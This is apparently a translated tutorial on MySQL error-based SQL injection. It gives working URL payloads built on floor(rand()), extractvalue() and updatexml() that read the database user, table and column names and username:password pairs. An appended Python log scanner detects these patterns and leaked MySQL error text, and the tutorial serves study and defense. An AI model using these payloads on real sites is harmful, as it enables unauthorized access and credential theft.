0x00_ Error-based injection principle
Error-based injection builds a payload so that the data being queried is carried back to the client inside the database error message. It works even when the query returns no content, as long as the application displays the error; UPDATE, INSERT and other statements also print an error message, so the technique applies to them as well.
0x01_ Error-based injection primitives
floor() error injection
MySQL template:
concat: concatenates strings
floor: rounds a value down to an integer
rand: returns a random float between 0 and 1
group by: groups and sorts the result set by one or more columns
select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2));
Reason: the GROUP BY key contains rand(), which is re-evaluated while the grouping is computed, so MySQL raises a duplicate-key error that contains the concatenated value.
Injection demonstration:
/?id=1' and (select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2)))--+
/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select user()),0x7e,floor(rand(0)*2)))--+
Look up table names
/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+
Table information (column names)
/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+
/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e,floor(rand(0)*2)))--+
extractvalue() error injection
template:
extractvalue(1,concat(0x7e,(select user()),0x7e));
Reason: the second argument is not valid XPath, so MySQL raises an XPATH syntax error that echoes it
/?id=1' and extractvalue(1,concat(0x7e,(select user()),0x7e))--+
updatexml() error injection
template:
select updatexml(1,concat(0x7e,(select user()),0x7e),1);
Reason: the second argument is not valid XPath, so MySQL raises an XPATH syntax error that echoes it
Injection demonstration:
/?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+
/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 0,1),0x7e),1)--+
/?id=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)--+
0x02_ Truncating data
substr()
The error message only shows a limited number of characters, so substr() is used to read a long value in slices.
/?id=1' and updatexml(1,concat(0x7e,(select substr(concat(username,0x3a,password),1,1) from users limit 0,1),0x7e),1)--+
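From the defender's side, the three primitives above leave distinctive traces both in request logs (updatexml/extractvalue wrapped around concat, or floor(rand(0)*2) inside a GROUP BY) and in response bodies (the XPATH and duplicate-entry error texts). The following added example, which is not part of the original page, scans constructed access-log request lines for those patterns after URL-decoding and flags response text that echoes the MySQL error strings; the log lines and rule names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log request lines (not real traffic); query strings are
# percent-encoded the way a web server records them.
SAMPLE_LOG = """\
GET /?id=1 HTTP/1.1
GET /?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--+ HTTP/1.1
GET /?id=1%27%20and%20(select%20count(*)%20from%20information_schema.tables%20group%20by%20concat((select%20version()),floor(rand(0)*2)))--+ HTTP/1.1
GET /?id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+ HTTP/1.1
GET /?q=extract+value+tutorial HTTP/1.1
"""

# Each rule names the error-based primitive it catches (rule names are assumed labels).
# Patterns run against the URL-decoded, lower-cased query string so encoding cannot hide them.
RULES = {
    "updatexml_xpath": re.compile(r"updatexml\s*\(.*concat\s*\(", re.S),
    "extractvalue_xpath": re.compile(r"extractvalue\s*\(.*concat\s*\(", re.S),
    "floor_rand_groupby": re.compile(r"group\s+by\s+.*floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.S),
}

# MySQL error texts these primitives produce. Seeing them in a response body means the
# application is echoing database errors to the client, which is the defect that makes
# error-based extraction possible; the fix is parameterized queries plus generic error pages.
LEAK_MARKERS = ("xpath syntax error:", "duplicate entry", "for key 'group_key'")

def normalize(query: str) -> str:
    # Decode twice: some clients double-encode, and decoding plain text is harmless.
    return unquote_plus(unquote_plus(query)).lower()

def classify_request(line: str) -> list:
    """Return the names of the rules that match one access-log request line."""
    parts = line.split()
    if len(parts) < 2 or "?" not in parts[1]:
        return []
    query = normalize(parts[1].split("?", 1)[1])
    return [name for name, rx in RULES.items() if rx.search(query)]

def scan_log(text: str) -> dict:
    """Map 1-based line numbers to the matched rule names, skipping clean lines."""
    hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        matched = classify_request(line)
        if matched:
            hits[n] = matched
    return hits

def leaks_db_error(body: str) -> bool:
    """True if a response body contains one of the MySQL error texts used by these primitives."""
    lowered = body.lower()
    return any(marker in lowered for marker in LEAK_MARKERS)

if __name__ == "__main__":
    for n, names in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(names)}")
```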